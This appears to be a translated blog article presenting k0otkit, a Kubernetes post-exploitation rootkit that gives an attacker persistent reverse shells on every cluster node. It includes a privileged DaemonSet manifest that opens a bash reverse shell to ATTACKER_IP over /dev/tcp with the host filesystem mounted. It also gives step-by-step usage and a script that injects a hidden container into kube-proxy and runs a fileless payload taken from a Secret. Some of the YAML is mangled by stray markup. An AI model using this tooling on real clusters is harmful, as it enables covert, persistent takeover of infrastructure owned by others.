K8s Rootkit cluster control

Preface to the article

k0otkit is a general post-exploitation technology that can be used to penetrate Kubernetes clusters. Attackers can use k0otkit to quickly, covertly and continuously operate all nodes in the target Kubernetes cluster (reverse shell). The main technologies used by K0otkit There are the following:

  • kube-proxy image (taken from local sources)

  • Dynamic container injection (high concealment)

  • Meterpreter (traffic encryption)

  • Fileless attack (high concealment)

  • DaemonSet and Secret resources (fast and continuous rebound, resource separation)

K8S Penetration

Common K8S clusters are as follows:

Common K8S penetration paths:

Image of K8S penetration process:

Cluster control

We need to go through the following stages to control a Kubernetes cluster:

Web Penetration >> Privilege Escalation >> Escape >> Master root >> ?

If the Master at this time participates in Pod scheduling, then we can use the DaemonSet resource feature (if a Pod hangs, the DaemonSet controller will automatically rebuild the Pod) to automatically deploy a Pod instance on all nodes, and at the same time, the DaemonSet and rebound will be The shells are combined to achieve the purpose of rebounding the shell control node. The following is an example:

apiVersion: apps/v1</code><code>kind: DaemonSet</code><code>metadata:</code><code>name: attacker</code><code>spec:</code> <code>selector:</code><code>matchLabels:</code><code> app: attacker</code><code>template:</code><code>metadata:</code><code> labels :</code><code> app: attacker</code><code>spec:</code><code> hostNetwork: true</code><code> hostPID: true</code><code> containers:</code><code> - name: main</code><code> image: bash</code><code> imagePullPolicy: IfNotPresent</code><code> command: ["bash"]</code><code> # reverse shell</code><code> args: ["-c", "bash -i > & amp; /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0> & amp;1"]</code><code> securityContext:</code><code> privileged: true</code><code> volumeMounts:</code><code> - mountPath: /host</code><code> name: host-root</code><code> volumes:</code><code> - name: host-root</code><code> hostPath:</code><code> path: /</code><code> type: Directory

Usage examples

Step 1: Download k0otkit

git clone https://github.com/Metarget/k0otkit</code><code>cd k0otkit/</code><code>chmod + x ./*.sh

Step 2: Replace ATTACKER_IP, ATTACKER_PORT and the number of payload bits in the pre_exp.sh file


Step 3: Generate k0otkit


Step 4: Run handle_multi_reverse_shell.sh


Step 5: Copy the contents of k0otkit.sh to the master node for execution (note the location of the kubeconfig file)








ctr_line_num=$(kubectl --kubeconfig /home/r00t/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')

volume_line_num=$(kubectl --kubeconfig /home/r00t/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')

image=$(kubectl --kubeconfig /home/r00t/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')

# create payload secret
cat << EOF | kubectl --kubeconfig /home/r00t/.kube/config apply -f -
apiVersion: v1
Kind: Secret
  name: $secret_name
  namespace: kube-system
type: Opaque

# assume that ctr_line_num < volume_line_num
# otherwise you should switch the two sed commands below

# inject malicious container into kube-proxy pod
kubectl --kubeconfig /home/r00t/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
  | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\
 path: /\
 type: Directory\
" \
  | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\
 image: $image\
 imagePullPolicy: IfNotPresent\
 command: ["sh"]\
 args: ["-c" , "echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(> & amp; =).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, <STDIN>; my \$pid = fork (); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))} '"]\
 - name: $payload_name\
 name: $secret_name\
 key: $secret_data_name\
 privileged: true\
 - mountPath: $mount_path\
 name: $volume_name" \
  | kubectl --kubeconfig /home/r00t/.kube/config replace -f -

Step 6: Wait for the rebound shell to come back

Step 7: Perform interactive operations

Step 8: Escape and take control of the node

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